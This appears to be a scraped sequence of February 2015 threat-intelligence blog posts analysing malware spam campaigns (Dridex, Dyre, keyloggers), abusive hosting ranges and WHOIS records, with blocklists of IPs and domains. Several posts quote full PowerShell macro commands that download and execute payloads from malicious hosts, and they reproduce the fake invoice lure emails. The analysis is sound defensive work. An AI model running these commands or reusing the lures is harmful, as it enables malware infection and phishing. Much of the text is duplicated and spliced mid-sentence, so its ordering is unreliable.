I've written about DINETHOSTING aka Digital Network JSC many times before, and frankly their entire IP range is a sea of crap, and I have a whole load of blocks in the 95.163.64.0/18 range (including the entirity of 95.163.64.0/10). This latest sea of badness seems to be suballocated to a customer using the 95.163.121.0/24 block.
inetnum: 95.163.121.0 - 95.163.121.255
netname: RU-CLOUDAVT-NET
descr: LLC ABT Cloud Network
country: RU
admin-c: PPP9992-RIPE
tech-c: PPP9992-RIPE
status: ASSIGNED PA
mnt-by: DN-MNT
changed: ncc@msm.ru 20150213
source: RIPE
person: Andrey Tkachenko
address: 107589, Russia Moscow street Khabarovsk 4A
e-mail: cc-it@com4tel.ru
phone: +7 916 626 7798
fax-no: +7 916 626 7798
nic-hdl: PPP9992-RIPE
abuse-mailbox: info@cloudavt.com
mnt-by: DN-MNT
changed: noc@msm.ru 20140429
source: RIPE
route: 95.163.64.0/18
descr: Digital Network JSC
descr: Moscow, Russia
descr: http://www.msm.ru
descr: aggregate prefix
origin: AS12695
mnt-by: DN-MNT
changed: noc@msm.ru 20121129
source: RIPE
Tools
Just looking at blog posts, I can see badness occurring in the recent past on the following IPs:
95.163.121.71 [1]
95.163.121.72 [2]
95.163.121.188 [3]
95.163.121.216 [4]
95.163.121.217 [5]
That's quite a high concentration of bad servers in a relatively small block. A quick look at what is currently hosted indicates (in my personal opinion) nothing of value, and I would recommend blocking the entire 95.163.121.0/24 range as a precaution.
Friday, 13 February 2015
Malware spam: "Alison Longworth [ALongworth@usluk.com]" / "PURCHASE ORDER (34663)"
From Alison Longworth [ALongworth@usluk.com]Attached is a malicious Word document 2600_001.DOC which actually comes in two different versions with low detection rates [1] [2] containing two slightly different macros [1] [2] which download a component from the following locations:
Date 13/02/2015 10:57
Subject PURCHASE ORDER (34663)
Please find attachment below of our Purchase Order No. 34663. Could you
please confirm receipt of this order and also advise when goods will be
available to collect.
NOTE TO ACCOUNTS: Could you please ensure all invoices for goods supplied
are forwarded promptly. Invoices received later than 2 working days after
month end will be dated, processed and paid the following month. To avoid
delays invoices can be sent electronically to accounts@usluk.com
Many Thanks,
Kind Regards,
Alison Longworth
Buyer (Manufacturing)
Universal Sealants (UK) Limited
Kingston House
3 Walton Road
Pattinson North
Washington
Tyne & Wear
NE38 8QA
W: www.usluk.com
E: alison.longworth@usluk.com
T: +44(0)191 416 1530
F: +44(0)191 402 1982
…Complete Solution for Bridge Deck Protection
USL BridgeCare, USL StructureCare, Nufins and Visul Systems are trading
divisions of Universal Sealants (UK) Limited.
Registered Office: Kingston House, 3 Walton Road, Pattinson North,
Washington, Tyne & Wear, NE38 8QA
Company Registration: 01494603
VAT Number: 353 8952 22
This email and any files transmitted with it are strictly confidential. It
is for the intended recipient only. If you have received this email in
error please notify the author by replying to this email. If you are not
the intended recipient, you must not disclose, copy, print or rely on this
email in any way. Any views expressed by an individual within email which
do not constitute or record professional advice relating to the business
of USL BridgeCare, USL StructureCare, Nufins and Visul Systems, do not
necessarily reflect the views of the company.
Important Notice
The information contained in this communication (including any
attachments) is confidential, may be attorney-client privileged, may
constitute inside information, and is intended only for the use of the
addressee. *Any Unauthorized use, disclosure or copying of this
information or any part thereof is strictly prohibited and may be
unlawful. If you have received this communication in error, please notify
us immediately by return e-mail and destroy this communication and all
copies thereof, including all attachments.
http://stroygp.ru/js/bin.exe
http://ibw-bautzen.de/js/bin.exe
This is saved as %TEMP%\dsHHH.exe and it has a detection rate of 13/57. Automated analysis tools [1] [2] [3] show the malware POSTing to:
37.139.47.105 (Pirix, Russia)
5.39.99.18 (OVH, France / Olga Borodynya, Russia)
The malware also drop a DLL with a MD5 of 6693f0093a2d6740149de5d6e950f6c6 (VT 6/57) which is the same Dridex DLL used in this campaign.
Malware spam: "Amazon Marketplace [delivery@amazon.uk]" / "Remittance [Report ID:34355-6014742]"
This email with no body text comes with a malicious Excel attachment:
From: Amazon Marketplace [delivery@amazon.uk]I have seen just a single sample of this with an attachment D87278F02E.XLS which has a zero detection rate at VirusTotal. This Excel spreadsheet contains this malicious Excel macro [pastebin] which attempts to execute the following command:
Date: 13 February 2015 at 14:34
Subject: RE: Remittance [Report ID:34355-6014742]
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://95.163.121.217/aksjdderwd/asdbwk/dhoei.exe','%TEMP%\oUhjidsf.exe');Start-Process '%TEMP%\oUhjidsf.exe';The downloaded file dhoei.exe is exactly the same as used in this spam run.
Malware spam: "Remittance XX12345678"
This spam comes from randomly-named companies, with slightly different body text and different subject in each case. Here is an example:
http://62.76.188.221/aksjdderwd/asdbwk/dhoei.exe
This is saved as %TEMP%\dsHHH.exe and has a detection rate of 7/57, identifed as a Dridex downloader. Automated analysis tools [1] [2] [3] [4] show a variety of activities, including communications with the following IPs:
85.143.166.72 (Pirix, Russia)
46.19.143.151 (Private Layer, Switzerland)
193.206.162.92 (Universita degli Studi dell'Insubria, Italy)
92.63.88.87 (MWTV, Latvia)
78.129.153.18 (iomart, UK)
205.185.119.159 (Frantech Solutions, US)
The malware then drops a Dridex DLL with a detection rate of 3/52 and mysteriously drops another Dridex downloader with a detection rate of 6/57. The Malwr report for that indicates there is some attempting traffic to nonexistent domains.
Recommended blocklist:
85.143.166.72
46.19.143.151
193.206.162.92
92.63.88.87
78.129.153.18
205.185.119.159
From: Gale BarlowThere is a malicious Word document attached to the email, so far I have only seen one version of this but usually there are two or more. The document itself has a low detection rate of 1/57 and it contains a malicious macrowhich downloads a file from the following location:
Date: 13 February 2015 at 12:30
Subject: Remittance IN56583285
Dear Sir/Madam,
I hope you are OK. I am writing you to let you know that total amount specified in the contract has been paid into your bank account on the 12th of February at 15:25 via BACS payment system and should reach the destination (beneficiary's) account within 3 working days.
To see full payment details please refer to the remittance advice note attached to the letter.
Any queries? Please reply back with your questions and you will receive a prompt and qualitative response as soon as possible. Please do not hesitate to write us.
Gale Barlow
Accounts Manager
4D PHARMA PLC
Boyd Huffman
Accounts Payable
GETECH GROUP
http://62.76.188.221/aksjdderwd/asdbwk/dhoei.exe
This is saved as %TEMP%\dsHHH.exe and has a detection rate of 7/57, identifed as a Dridex downloader. Automated analysis tools [1] [2] [3] [4] show a variety of activities, including communications with the following IPs:
85.143.166.72 (Pirix, Russia)
46.19.143.151 (Private Layer, Switzerland)
193.206.162.92 (Universita degli Studi dell'Insubria, Italy)
92.63.88.87 (MWTV, Latvia)
78.129.153.18 (iomart, UK)
205.185.119.159 (Frantech Solutions, US)
The malware then drops a Dridex DLL with a detection rate of 3/52 and mysteriously drops another Dridex downloader with a detection rate of 6/57. The Malwr report for that indicates there is some attempting traffic to nonexistent domains.
Recommended blocklist:
85.143.166.72
46.19.143.151
193.206.162.92
92.63.88.87
78.129.153.18
205.185.119.159
Thursday, 12 February 2015
Questionable network: 5.135.127.64/27 / userlogin.me
While researching this spam I came across a questionable OVH reseller using the 5.135.127.64/27 range, allocated to userlogin.me.
organisation: ORG-WC13-RIPE
org-name: userlogin
org-type: OTHER
address:
e-mail: support@userlogin.me
abuse-mailbox: abuse@userlogin.me
descr: Userlogin account solutions
mnt-ref: OVH-MNT
mnt-by: OVH-MNT
changed: noc@ovh.net 20140521
source: RIPE
A look at passive DNS records show a variety of sites including stressers, phishing pages, spammers, some malware, plus some other sites which are probably less evil. A lot of these sites are hiding behind Cloudflare, some other sites have moved on to other hosts.
I checked the current IPs and reputations of all the domains that I can find associate with the domain and put them here [csv]. Don't assume they are all evil, but some of those sites are.. interesting.
organisation: ORG-WC13-RIPE
org-name: userlogin
org-type: OTHER
address:
e-mail: support@userlogin.me
abuse-mailbox: abuse@userlogin.me
descr: Userlogin account solutions
mnt-ref: OVH-MNT
mnt-by: OVH-MNT
changed: noc@ovh.net 20140521
source: RIPE
A look at passive DNS records show a variety of sites including stressers, phishing pages, spammers, some malware, plus some other sites which are probably less evil. A lot of these sites are hiding behind Cloudflare, some other sites have moved on to other hosts.
I checked the current IPs and reputations of all the domains that I can find associate with the domain and put them here [csv]. Don't assume they are all evil, but some of those sites are.. interesting.
Labels:
OVH
"invoice :reminder" spam leads to CVE-2012-0158 exploit
This spam has a malicious attachment:
Attached is a file INVOICE.doc which is actually not a DOC at all, but an RTF file. A scan of the file at VirusTotal indicates that is is malicious, with a detection rate of 6/57. Those detection indicate that this is exploitng CVE-2012-0158 aka MS12-027, a security flaw patched almost three years ago. So if you keep your patches up-to-date, there's a good chance you will be OK. But if you are running an ancient version of Microsoft Office (for example Office 2000, 2002 or XP) then you could be in trouble.
The Malwr report for this is quite enlightening, showing the malware downloading another document from directxex.net/7783ed117ba0d69e/wisdomjacobs.exe. This has a detection rate of 14/57 and the Malwr report for this indicates that among other things it installs a keylogger, confirmed by the ThreatExpert report.
The domain directxex.net [Googe Safebrowsing] has an unsavoury reputation, and although it is currently hiding behind a Cloudflare IP, it actually appears to be hosted on an OVH France IP of 5.135.127.68. I definitely recommend that you block traffic to directxex.net.
From: Hajime Daichi
Date: 12 February 2015 at 15:59
Subject: invoice :reminder
Greetings.
Please find attached invoice copy for a transfer of USD29,900.00 payed to
your company account yesterday.
You can save, view and print this SWIFT message at your convenience.
Please email should you require any additional information on this
transaction.
We thank you for your continued patronage.
Corp. Office / Showroom:
# 8-2-293/82/A/706/1,
Road No. 36, Jubilee Hills,
HYDERABAD - 500 033.
Tel: +91 40 2355 4474 / 77
Fax:+91 40 2355 4466
E-mail: info@valueline.in
Branches : VIZAG | VIJAYAWADA | BANGALORE | MUMBA
Attached is a file INVOICE.doc which is actually not a DOC at all, but an RTF file. A scan of the file at VirusTotal indicates that is is malicious, with a detection rate of 6/57. Those detection indicate that this is exploitng CVE-2012-0158 aka MS12-027, a security flaw patched almost three years ago. So if you keep your patches up-to-date, there's a good chance you will be OK. But if you are running an ancient version of Microsoft Office (for example Office 2000, 2002 or XP) then you could be in trouble.
The Malwr report for this is quite enlightening, showing the malware downloading another document from directxex.net/7783ed117ba0d69e/wisdomjacobs.exe. This has a detection rate of 14/57 and the Malwr report for this indicates that among other things it installs a keylogger, confirmed by the ThreatExpert report.
The domain directxex.net [Googe Safebrowsing] has an unsavoury reputation, and although it is currently hiding behind a Cloudflare IP, it actually appears to be hosted on an OVH France IP of 5.135.127.68. I definitely recommend that you block traffic to directxex.net.
Malware spam: "BBB Accreditation Services [no-replay@newyork.bbb.org]" / "BBB SBQ Form"
This fake BBB email has a malicious attachment.
Attached is a file SQB Form.zip which contains a malicious executable SQB Form.exe. This has a VirusTotal detection rate of 4/57. Automated analysis tools [1] [2] [3] [4] show that attempts to connect to these following legitimate IPs and domains to determine the IP address and current time:
134.170.185.211
time.microsoft.akadns.net
checkip.dyndns.org
Of these, checkip.dyndns.org is worth monitoring as it is often an indicator of infection.
The Anubis report also shows a DNS query to semiyun.com on 95.173.170.227 (Netinternet, Turkey). Also the Malwr report shows connections to the following URLs:
http://92.240.99.70:12112/1202uk11/HOME/0/51-SP:/0/ELHBEDIBEHGBEHK
http://92.240.99.70:12112/1202uk11/HOME/41/7/4/
http://semiyun.com/mandoc/previewa.pdf
Of these, 92.240.99.70 (Ukrainian High Technologies Ltd, Ukraine) looks like the C&C server and this should definitely be blocked.
A file jeoQxZ5.exe is also dropped with a detection rate of 6/57. This is most likely the Dyre banking trojan. Samples can be found here, password is infected.
From: BBB Accreditation Services [no-replay@newyork.bbb.org]
Date: Thu, 12 Feb 2015 10:50:01 +0000
Subject: BBB SBQ Form
Thank you for supporting your Better Business Bureau (BBB).
As a service to BBB Accredited Businesses, we try to ensure that the information we provide to potential customers is as accurate as possible. In order for us to provide the correct information to the public, we ask that you review the information that we have on file for your company.
We encourage you to print this SBQ Form, answer the questions and respond to us. (Adobe PDF)
Please look carefully at your telephone and fax numbers on this sheet, and let us know any and all numbers used for your business (including 800, 900, rollover, and remote call forwarding). Our automated system is driven by telephone/fax numbers, so having accurate information is critical for consumers to find information about your business easily.
Thank you again for your support, and we look forward to receiving this updated information.
Sincerely,
Accreditation Services
Attached is a file SQB Form.zip which contains a malicious executable SQB Form.exe. This has a VirusTotal detection rate of 4/57. Automated analysis tools [1] [2] [3] [4] show that attempts to connect to these following legitimate IPs and domains to determine the IP address and current time:
134.170.185.211
time.microsoft.akadns.net
checkip.dyndns.org
Of these, checkip.dyndns.org is worth monitoring as it is often an indicator of infection.
The Anubis report also shows a DNS query to semiyun.com on 95.173.170.227 (Netinternet, Turkey). Also the Malwr report shows connections to the following URLs:
http://92.240.99.70:12112/1202uk11/HOME/0/51-SP:/0/ELHBEDIBEHGBEHK
http://92.240.99.70:12112/1202uk11/HOME/41/7/4/
http://semiyun.com/mandoc/previewa.pdf
Of these, 92.240.99.70 (Ukrainian High Technologies Ltd, Ukraine) looks like the C&C server and this should definitely be blocked.
A file jeoQxZ5.exe is also dropped with a detection rate of 6/57. This is most likely the Dyre banking trojan. Samples can be found here, password is infected.
Malware spam: "Minuteman Press West Loop" / "westloop@minutemanpress.com" / "INVOICE 1398 - FEB 4 2015"
This fake invoice comes with a malicious attachment. It does not come from Minuteman Press, their systems have not been compromised in any way. Instead this is a simple email forgery.
http://ecinteriordesign.com/js/bin.exe
This is then saved as %TEMP%\\IHJfffFF.exe and has a detection rate of 7/57. Automated analysis tools [1] [2] [3] show attempted connections to:
37.139.47.105
78.140.164.160
41.56.49.36
104.232.34.68
210.181.222.118
The Malwr report shows that it drops a DLL with an MD5 of 9001023d93beccd6c28ba67cbbc10cec which had a low detection rate at VT when it was checked a couple of hours ago.
From: Minuteman Press West Loop [westloop@minutemanpress.com]I have seen just a single sample with an attachment INVOICE 1398 - FEB 4 2015.doc, although usually there are two or more variants so you may see slightly different ones. The DOC file has a VirusTotal detection rate of 0/57 and contains this malicious macro which downloads a second component from:
Reply-To: westloop@minutemanpress.com
Date: 12 February 2015 at 09:00
Subject: INVOICE 1398 - FEB 4 2015
(Please see attached file: INVOICE 1398 - FEB 4 2015.DOC)
Thank you for your business.
Julio Lopez | Design Manager | Minuteman Press West Loop
1326 W. Washington Blvd. | Chicago, IL 60607
p 312.291.8966 | f 312.929.2472 |
http://ecinteriordesign.com/js/bin.exe
This is then saved as %TEMP%\\IHJfffFF.exe and has a detection rate of 7/57. Automated analysis tools [1] [2] [3] show attempted connections to:
37.139.47.105
78.140.164.160
41.56.49.36
104.232.34.68
210.181.222.118
The Malwr report shows that it drops a DLL with an MD5 of 9001023d93beccd6c28ba67cbbc10cec which had a low detection rate at VT when it was checked a couple of hours ago.
Wednesday, 11 February 2015
Malware spam: "Gail Walker [gail@mblseminars.com]" / "Outstanding Invoice 271741"
This fake invoice does NOT comes from MBL Seminars, they are not sending this spam nor have their systems been compromised. Instead, this is a forgery with a malicious attachment.
http://www.rapidappliances.co.uk/js/bin.exe
http://translatorswithoutborders.com/js/bin.exe
This file is saves as %TEMP%\dsHHH.exe. It has a VirusTotal detection rate of 10/57. Automated analysis tools [1] [2] [3] show attempted connections to the following IPs:
37.139.47.105 (Comfortel, Russia)
5.39.99.18 (OVH, France / Olga Borodynya, Russia)
136.243.237.218 (Hetzner, Germany)
66.110.179.66 (Microtech Tel, US)
78.140.164.160 (Webazilla, Netherlands / Fozzy Inc, US)
109.234.38.70 (Mchost, Russia)
The Malwr report suggests an attempt to connect to these nonexistent domains:
U1Q6nUgvQfsx4xDu.com
bpmIYYreSPwa7.com
zdMjztmwoDX7cD.com
It also drops a DLL with a detection rate of 3/57 which is probably Dridex.
Recommended blocklist:
37.139.47.105
5.39.99.18
136.243.237.218
66.110.179.66
78.140.164.160
109.234.38.70
For researchers, a copy of the files can be found here. Password is infected.
http://advancedheattreat.com/js/bin.exe
http://ecinteriordesign.com/js/bin.exe
The payload appears to be the same as the one used in this spam run.
From: Gail Walker [gail@mblseminars.com]So far I have seen two different malicious Word documents (there may be more) with low detection rates [1] [2] containing a different macro each [1] [2]. These download a component from the following locations:
Date: 11 February 2015 at 09:52
Subject: Outstanding Invoice 271741
Dear Customer
Payment for your Season Ticket was due by 31 January 2015 and has not yet been received. A copy of the invoice is attached.
By way of a reminder, the Season Ticket entitles all members of your organisation to save up to 50% on our public seminars and webinars. Since being a Season Ticket Holder your organisation has saved £728.50.
Please arrange for payment by return by BACS, cheque, or credit card. If payment has been arranged and just not reached us yet then please ignore this email.
If you have any queries, please do not hesitate to contact us.
Regards
Gail Walker
MBL (Seminars) Limited
The Mill House
6 Worsley Road
Worsley
Manchester
United Kingdom
M28 2NL
Tel: +44 (0)161 793 0984
Fax: +44 (0)161 728 8139
http://www.rapidappliances.co.uk/js/bin.exe
http://translatorswithoutborders.com/js/bin.exe
This file is saves as %TEMP%\dsHHH.exe. It has a VirusTotal detection rate of 10/57. Automated analysis tools [1] [2] [3] show attempted connections to the following IPs:
37.139.47.105 (Comfortel, Russia)
5.39.99.18 (OVH, France / Olga Borodynya, Russia)
136.243.237.218 (Hetzner, Germany)
66.110.179.66 (Microtech Tel, US)
78.140.164.160 (Webazilla, Netherlands / Fozzy Inc, US)
109.234.38.70 (Mchost, Russia)
The Malwr report suggests an attempt to connect to these nonexistent domains:
U1Q6nUgvQfsx4xDu.com
bpmIYYreSPwa7.com
zdMjztmwoDX7cD.com
It also drops a DLL with a detection rate of 3/57 which is probably Dridex.
Recommended blocklist:
37.139.47.105
5.39.99.18
136.243.237.218
66.110.179.66
78.140.164.160
109.234.38.70
For researchers, a copy of the files can be found here. Password is infected.
UPDATE 2015-02-12
Another spam run is under way, with the same text but two different DOC files with zero detections [1] [2] containing one of two malicious macros [1] [2] that download another component from one of the following locations:http://advancedheattreat.com/js/bin.exe
http://ecinteriordesign.com/js/bin.exe
The payload appears to be the same as the one used in this spam run.
Malware spam: "Your latest e-invoice from.."
This fake invoice spam has a malicious attachment:
Your latest e-invoice from HSBC HLDGS
Your latest e-invoice from MAVEN INCOME & GROWTH VCT 3 PLC
Your latest e-invoice from DDD GROUP PLC
Your latest e-invoice from BAILLIE GIFFORD SHIN NIPPON
Your latest e-invoice from ACAL
Your latest e-invoice from PARAGON DIAMONDS LTD
Your latest e-invoice from TULLETT PREBON PLC
Your latest e-invoice from MERSEY DOCKS & HARBOUR CO
Your latest e-invoice from HOLDERS TECHNOLOGY
Your latest e-invoice from LED INTL HLDGS LTD
Your latest e-invoice from HALOS
Your latest e-invoice from ACORN INCOME FUND
Your latest e-invoice from BLACKROCK WORLD MINING TRUST PLC
Your latest e-invoice from NATURE GROUP PLC
Your latest e-invoice from OPTOS
Your latest e-invoice from MENZIES(JOHN)
Your latest e-invoice from ATLANTIC COAL PLC
The word document is randomly-named, for example 256IFV.doc, 19093WZ.doc and 097DVN.doc. There are three different versions of this malicious document, all with low detection rates [1] [2] [3] containing a slightly different macro in each case [1] [2] [3]. If we deobfuscate the macro, we see some code like this:
http://136.243.237.222:8080/hhacz45a/mnnmz.php (Hetzer, Germany)
http://185.48.56.62:8080/hhacz45a/mnnmz.php (Sinarohost, Netherlands)
http://95.163.121.216:8080/hhacz45a/mnnmz.php (Digital Networks aka DINETHOSTING, Russia)
The code is downloaded as zzcasr.exe and is then saved as %TEMP%\pJIOfdfs.exe. This binary is of course malicious, with a detection rate of 5/57.
Automated analysis tools [1] [2] [3] [4] [5] show that it attempts to contact the following IPs:
85.143.166.72 (Pirix, Russia)
92.63.88.97 (MWTV, Latvia)
205.185.119.159 (FranTech Solutions, US)
78.129.153.18 (IOmart, UK)
5.14.26.146 (RCS & RDS Residential, Romania)
The malware probably drops a Dridex DLL, although I have not been able to obtain this.
Recommended blocklist:
85.143.166.72
92.63.88.97
205.185.119.159
78.129.153.18
5.14.26.146
136.243.237.222
185.48.56.62
95.163.121.216
(Note, for researchers only a copy of the files can be found here, password=infected)
From: Lydia OnealThe company name and the name of the sender varies, but most of the body text remains identical. Some sample subjects are:
Date: 11 February 2015 at 09:14
Subject: Your latest e-invoice from HSBC HLDGS
Dear Valued Customer,
Please find attached your latest invoice that has been posted to your online account. You’ll be pleased to know that your normal payment terms still apply as detailed on your invoice.
Rest assured, we operate a secure system, so we can confirm that the invoice DOC originates from HSBC HLDGS and is authenticated with a digital signature.
Thank you for using e-invoicing with HSBC HLDGS - the smarter, faster, greener way of processing invoices.
This message and any attachment are confidential and may be privileged or otherwise protected from disclosure.
If you are not the intended recipient, please telephone or email the sender and delete this message and any attachment from your system.
If you are not the intended recipient you must not copy this message or attachment or disclose the contents to any other person.
Your latest e-invoice from HSBC HLDGS
Your latest e-invoice from MAVEN INCOME & GROWTH VCT 3 PLC
Your latest e-invoice from DDD GROUP PLC
Your latest e-invoice from BAILLIE GIFFORD SHIN NIPPON
Your latest e-invoice from ACAL
Your latest e-invoice from PARAGON DIAMONDS LTD
Your latest e-invoice from TULLETT PREBON PLC
Your latest e-invoice from MERSEY DOCKS & HARBOUR CO
Your latest e-invoice from HOLDERS TECHNOLOGY
Your latest e-invoice from LED INTL HLDGS LTD
Your latest e-invoice from HALOS
Your latest e-invoice from ACORN INCOME FUND
Your latest e-invoice from BLACKROCK WORLD MINING TRUST PLC
Your latest e-invoice from NATURE GROUP PLC
Your latest e-invoice from OPTOS
Your latest e-invoice from MENZIES(JOHN)
Your latest e-invoice from ATLANTIC COAL PLC
The word document is randomly-named, for example 256IFV.doc, 19093WZ.doc and 097DVN.doc. There are three different versions of this malicious document, all with low detection rates [1] [2] [3] containing a slightly different macro in each case [1] [2] [3]. If we deobfuscate the macro, we see some code like this:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://136.243.237.222:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';The macro is calling Powershell to download and execute code from these locations:
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.62:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://95.163.121.216:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';
http://136.243.237.222:8080/hhacz45a/mnnmz.php (Hetzer, Germany)
http://185.48.56.62:8080/hhacz45a/mnnmz.php (Sinarohost, Netherlands)
http://95.163.121.216:8080/hhacz45a/mnnmz.php (Digital Networks aka DINETHOSTING, Russia)
The code is downloaded as zzcasr.exe and is then saved as %TEMP%\pJIOfdfs.exe. This binary is of course malicious, with a detection rate of 5/57.
Automated analysis tools [1] [2] [3] [4] [5] show that it attempts to contact the following IPs:
85.143.166.72 (Pirix, Russia)
92.63.88.97 (MWTV, Latvia)
205.185.119.159 (FranTech Solutions, US)
78.129.153.18 (IOmart, UK)
5.14.26.146 (RCS & RDS Residential, Romania)
The malware probably drops a Dridex DLL, although I have not been able to obtain this.
Recommended blocklist:
85.143.166.72
92.63.88.97
205.185.119.159
78.129.153.18
5.14.26.146
136.243.237.222
185.48.56.62
95.163.121.216
(Note, for researchers only a copy of the files can be found here, password=infected)
Tuesday, 10 February 2015
Malware spam: "Megtrade groups [venkianch@gmail.com]" / "RE: Purchase Order Copy"
This spam comes with a malicious attachment:
As you might expect, this is malicious in nature and has a VirusTotal detection rate of 34/57. The Malwr analysis indicates that this installs a keylogger among other things.
From: Megtrade groups [venkianch@gmail.com]Unusually, this email does not appear to be sent out by a botnet but has been sent through Gmail. The link in the email goes www.ebayonline.com.ng/download/ohafi/jfred/Purchase%20Order%20Copy_pdf.7z where it downloads a file Purchase Order Copy_pdf.7z which (if you have 7-Zip installed) uncompresses to the trickily-named (1) Purchase Order Copy.pdf ___________________ (2) Delivery Time and Packing.pdf _______________________ _____ Adobe Reader.pdf or in .exe
Reply-To: venkanch@gmail.com
Date: 10 February 2015 at 15:47
Subject: RE: Purchase Order Copy
Hello Vendor,
I just got back from business trip, Please find attached our purchasing order let us know price so as to confirm sample with your company.
You give us your payment terms but note our company payment policy 30% prepayment after confirming proforma invoice from you and the balance against copy of B/L.
Kindly treat as urgent and send invoice, I await to have your urgent reply to proceed.
Thanks & Best regards,
Mr Venkianch
Managing Director
NZ Megtrade Groups Ltd
Download Attachment As zip
As you might expect, this is malicious in nature and has a VirusTotal detection rate of 34/57. The Malwr analysis indicates that this installs a keylogger among other things.
Friday, 6 February 2015
Something evil on 5.196.143.0/28 and 5.196.141.24/29 (verelox.com)
This quite interesting blog post from Cyphort got me digging into that part of the infection chain using nonsense .eu domains. It uncovered a whole series of IPs and domains that have been used to spread Cryptowall (possibly other malware too), hosted in the 5.196.143.0/28 and 5.196.141.24/29 ranges (and possibly more).
These are OVH IP ranges, suballocated to a customer called Verelox.com. I think that Verelox is a legitimate but very small web host that has suffered a major compromise of their servers.
The first range is 5.196.141.24/29 which has apparently compromised servers at:
..you can see a dump of probably evil domains in this pastebin. The second range is 5.196.143.0/28 with apparently compromised servers at:
..you can see a list of those domains in this pastebin.
Registration details of the domains vary, including some that use the somewhat amusing email address reach4keys@gmail.com. Some of the .eu domains and the .xyz domains have contact details as follows:
Registrant ID: INTE54fjkzffmcv1
Registrant Name: Ramil Jamaletdinov
Registrant Organization:
Registrant Street: Bolshaya str, 15, kv.12
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 105553
Registrant Country: RU
Registrant Phone: +7.90988766754
Registrant Phone Ext:
Registrant Fax: +7.
Registrant Fax Ext:
Registrant Email: jramil889@gmail.com
I don't know if this person actually exists or indeed has anything to do with this, all searches come up blank.
In addition to this, some of these domains use nameservers on the following IP addresses:
168.235.70.106
168.235.69.219
These are allocated to Ramnode LLC in the US. I would suggest that they are under the control of the bad guys and are worth blocking traffic to.
Note that Cyphort identift these C&C servers for the malware:
asthalproperties.com:4444
pratikconsultancy.com:8080
The following IPs and domain names all seem to be connected and I would recommend blocking at least the IP addresses and domains in bold (the other domains look like they are probably throwaway ones):
5.196.143.0/28
5.196.141.24/29
168.235.69.219
168.235.70.106
asthalproperties.com
pratikconsultancy.com
2hk7.eu
8m3a.eu
aaawq1.eu
aaawq2.eu
aaawq3.eu
asoooe1.eu
asoooe2.eu
asoooe3.eu
asw1.eu
asw2.eu
asw3.eu
bilipa.eu
bimbino.eu
bindarov.eu
c4c7.eu
cemtro3.eu
demotikvk.eu
dnor1.eu
dnor2.eu
dnor3.eu
efrai1.eu
efrai2.eu
fesvom.eu
fliston.eu
g19f.eu
gerww3.eu
giuyt5.eu
giuyt6.eu
grannu1.eu
gremn2.eu
gremn3.eu
gyyf.eu
happer1.eu
happer2.eu
happer3.eu
happer4.eu
happer5.eu
happer6.eu
hewoq5.eu
hewoq6.eu
hrt1.eu
hrt2.eu
huayolo.eu
joybul.eu
kalinda.eu
manike.eu
nicjaa5.eu
nicjaa6.eu
ponrel.eu
sindy5.eu
slanecom.eu
slawq2.eu
solonecem.eu
timona.eu
volosq.eu
vvyyyx.eu
kreni.xyz
slanecom.xyz
solonecem.xyz
These are OVH IP ranges, suballocated to a customer called Verelox.com. I think that Verelox is a legitimate but very small web host that has suffered a major compromise of their servers.
The first range is 5.196.141.24/29 which has apparently compromised servers at:
5.196.141.24
5.196.141.25
5.196.141.26
5.196.141.27..you can see a dump of probably evil domains in this pastebin. The second range is 5.196.143.0/28 with apparently compromised servers at:
5.196.143.3
5.196.143.4
5.196.143.5
5.196.143.6
5.196.143.7
5.196.143.8
5.196.143.10
5.196.143.11
5.196.143.12
5.196.143.13..you can see a list of those domains in this pastebin.
Registration details of the domains vary, including some that use the somewhat amusing email address reach4keys@gmail.com. Some of the .eu domains and the .xyz domains have contact details as follows:
Registrant ID: INTE54fjkzffmcv1
Registrant Name: Ramil Jamaletdinov
Registrant Organization:
Registrant Street: Bolshaya str, 15, kv.12
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 105553
Registrant Country: RU
Registrant Phone: +7.90988766754
Registrant Phone Ext:
Registrant Fax: +7.
Registrant Fax Ext:
Registrant Email: jramil889@gmail.com
I don't know if this person actually exists or indeed has anything to do with this, all searches come up blank.
In addition to this, some of these domains use nameservers on the following IP addresses:
168.235.70.106
168.235.69.219
These are allocated to Ramnode LLC in the US. I would suggest that they are under the control of the bad guys and are worth blocking traffic to.
Note that Cyphort identift these C&C servers for the malware:
asthalproperties.com:4444
pratikconsultancy.com:8080
The following IPs and domain names all seem to be connected and I would recommend blocking at least the IP addresses and domains in bold (the other domains look like they are probably throwaway ones):
5.196.143.0/28
5.196.141.24/29
168.235.69.219
168.235.70.106
asthalproperties.com
pratikconsultancy.com
2hk7.eu
8m3a.eu
aaawq1.eu
aaawq2.eu
aaawq3.eu
asoooe1.eu
asoooe2.eu
asoooe3.eu
asw1.eu
asw2.eu
asw3.eu
bilipa.eu
bimbino.eu
bindarov.eu
c4c7.eu
cemtro3.eu
demotikvk.eu
dnor1.eu
dnor2.eu
dnor3.eu
efrai1.eu
efrai2.eu
fesvom.eu
fliston.eu
g19f.eu
gerww3.eu
giuyt5.eu
giuyt6.eu
grannu1.eu
gremn2.eu
gremn3.eu
gyyf.eu
happer1.eu
happer2.eu
happer3.eu
happer4.eu
happer5.eu
happer6.eu
hewoq5.eu
hewoq6.eu
hrt1.eu
hrt2.eu
huayolo.eu
joybul.eu
kalinda.eu
manike.eu
nicjaa5.eu
nicjaa6.eu
ponrel.eu
sindy5.eu
slanecom.eu
slawq2.eu
solonecem.eu
timona.eu
volosq.eu
vvyyyx.eu
kreni.xyz
slanecom.xyz
solonecem.xyz
Labels:
Cryptowall,
Evil Network,
Malware,
OVH,
Viruses
Thursday, 5 February 2015
Malware spam: "Unable to deliver your item, #000022074" / "FedEx 2Day A.M"
This fake FedEx spam has a malicious script attached.
UPDATE: This tweet gives a bit more insight into the malware..
xxx
